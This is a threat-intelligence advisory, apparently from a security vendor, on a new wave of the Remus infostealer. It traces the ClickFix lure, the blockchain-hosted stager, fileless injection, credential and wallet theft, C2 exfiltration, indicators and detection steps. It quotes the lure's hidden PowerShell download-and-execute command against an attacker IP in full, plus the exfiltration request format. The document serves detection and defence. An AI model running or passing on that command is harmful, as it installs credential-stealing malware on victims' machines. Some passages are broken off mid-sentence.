A new wave of the WP-002 / Remus infostealer is being delivered through a
compromised WordPress site (dorz[.]nl) that stages a ClickFix
paste-and-run lure via a BSC-testnet EtherHiding contract. The chain terminates in a
fileless native stealer core injected into a hollowed browser process, with a managed .NET
collection component and RSA-wrapped HTTP exfiltration.
Versus prior waves, the delivery front-end was rebuilt (IExpress-SFX + AutoIt loader
replacing the MZER/Donut branch), but the durable RSA-1024 C2 handshake key
(dc4cb858…febfac6f, e=65537) is CONFIRMED — resolved
in process memory across two independent detonations. Attribution is held at the
infrastructure level; no named-group assertion.
Injected page pulls a stage from a blockchain contract. The host itself is a victim (splitcam: never blocklisted).
Contract 0xae5d8eec…08034 (selector 0xe2179b8e),
read via data-seed-prebsc-1-s1.binance.org, returns base64 JS appending the
asseload.com widget.
aps.js chain-loads a/9f2b4d03635c.js
(XOR key oipCQd0DIbeF) — fake Cloudflare verify: Win+R → Ctrl+V → OK,
poisoning the clipboard.
powershell -w h -c "iex((New-Object Net.WebClient).DownloadString('hxxp://193.221.200.66:4139/tools/soft/coms'))"
IntroductionChassis.exe drops legit AutoIt3.exe +
packed Corpus.a3x; runs AutoIt3.exe Corpus.a3x.
Native Remus core injected fileless into a hollowed browser process at
0x140000000 via SetThreadContext/WriteProcessMemory.
Managed .NET component reads browser profile/credential stores and enumerates cryptocurrency wallet artifacts. Firefox profile access observed.
POST /invoices to 209.38.82.72:9048
(cdire[.]shop), Host: github.com spoof. Body schema rotated between
waves (access_token/debug → tag/exp/hwid).
Task Scheduler COM API / at.exe invocation.
dc4cb858…febfac6f, e=65537) resolved in the PowerShell stage
memory across two independent detonations. It is runtime-resolved, never present
in the static a3x — which is why on-disk/wire hunts came up empty.cdire[.]shop → 209.38.82.72:9048,
resolved directly from the packet capture (not only the sandbox report). Same /invoices,
same github.com host-spoof.4cea7ae8… matches neither prior WP-002 anchor. Delivery was rebuilt while the
terminal family and C2 key held.OLEAUT32 BSTR allocation
(allocate → use → free), so it never exists as a durable contiguous string. This matches the
runtime-keyed target-list sealing first documented in v14.x (wire payload RSA-1024-wrapped;
target list runtime-keyed AES). Static recovery is not expected; capability is bounded to the
import surface and host telemetry below. Re-confirmation across waves, not a first observation.The terminal native core (region 0x140000000, PID 5528) was disassembled defensively.
Its resolved import address table bounds what the payload can do — without any reconstruction of the
runtime-keyed logic. All 36 imports below are confirmed present in the dumped image across six modules
(KERNEL32 · ole32 · USER32 · ADVAPI32 · GDI32 · OLEAUT32).
| Capability | Imports | ATT&CK |
|---|---|---|
| Screen capture | BitBlt · CreateCompatibleBitmap · CreateCompatibleDC · GetDIBits · GetWindowDC · GetDC · GetObjectW · SelectObject | T1113 |
| Hidden desktop (invisible interaction) | CreateDesktopW · OpenDesktopW · CloseDesktop · EnumDisplaySettingsW | T1564 |
| COM / OLE automation (config & BSTR handling) | CoCreateInstance · CoInitializeSecurity · CoSetProxyBlanket · CoInitialize · CoUninitialize | T1559.001 |
Host / user fingerprint (→ exfil hwid) | GetComputerNameA · GetComputerNameExA · GetUserNameA · GetKeyboardLayout · GetKeyboardLayoutNameW | T1082 · T1033 |
| Privilege / token inspection | LookupPrivilegeValueW | T1134 |
| Clipboard / global-memory handling | GlobalLock · GlobalUnlock · LocalFree | T1115 |
.text (function chunks at
0x140001CDE, 0x1400026B3), a byte-wise decode loop
(movzx / test / jz), and a mid-instruction jmp — characteristic of a
runtime unpacker stub, not the resolved collector.| Type | Value | Role | Handling |
|---|---|---|---|
| domain | cdire[.]shop | Remus C2 (new) | block |
| ipv4 | 209.38.82.72:9048 | Remus C2 (2 waves) | block |
| domain | asseload[.]com | ClickFix stager | block |
| ipv4 | 193.221.200.66:4139 | PS dropper + ZIP host | block |
| eth | 0xae5d8eec…08034 | EtherHiding contract | track |
| url | hxxp://dorz[.]nl/ | Compromised lure | VICTIM — notify, do not block |
| Type | Value | Note |
|---|---|---|
| sha256 | 2a1d78fb…9787680 | IntroductionChassis.exe (IExpress SFX) |
| sha256 | 74a517b6…7a4a67f | Corpus.a3x (compiled AutoIt, packed) |
| sha256 | 92c6531a…733f9f45 | AutoIt3.exe (legit interpreter, abused LOLBin) |
| sha256 (.text) | eba3f014…4c138 | Terminal native core — fileless @0x140000000; whole-image hash mutates, use .text |
| modulus | dc4cb858…febfac6f | Durable RSA-1024 C2 key (e=65537), runtime-resolved |
Full rulesets ship alongside this advisory: YARA
(SL-ADV-2026-WP-001-V15.yar, 7 rules), Sigma
(SL-ADV-2026-WP-001-V15.sigma.yml, 8 rules), and a STIX 2.1 bundle
(SL-ADV-2026-WP-001-V15.stix.json, 47 objects with kill-chain relationships).
The exfil beacon spoofs Host: github.com while connecting to a non-GitHub IP —
that mismatch is the cleanest network signal:
POST /invoices HTTP/1.1 Host: github.com <-- spoofed; destination is 209.38.82.72 / cdire.shop User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/117.0.0.0 Content-Type: application/x-www-form-urlencoded tag=<hex>&exp=<epoch>&hwid=<hex> (variant-2; variant-1 = access_token=<guid>&debug=<hex>)
| Priority | Action |
|---|---|
| now | Block C2 209.38.82.72, cdire[.]shop, stager asseload[.]com, payload host 193.221.200.66. |
| now | Alert on POST /invoices + spoofed Host: github.com to non-GitHub destinations. |
| soon | Hunt powershell -w h … DownloadString cradles and AutoIt3.exe injecting into browsers. |
| coord | Notify dorz[.]nl host/registrar (.nl abuse) — victim cleanup, not blocklisting. |
Attribution stance: infrastructure-level only; no named-group or nation-state assertion. Splitcam rule: compromised lure/victim hosts are never added to blocklists. Provenance: all indicators reconstructed from packet captures and memory dumps by Dispensight/SecureLeaf; the durable-key confirmation and new C2 were verified against the raw captures, not solely the sandbox report. The runtime-keyed target-list sealing and DUI70/OLEAUT capability profile are re-confirmations of findings first established in v14.x, not first observations.
SL-ADV-2026-WP-001 v15.2 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com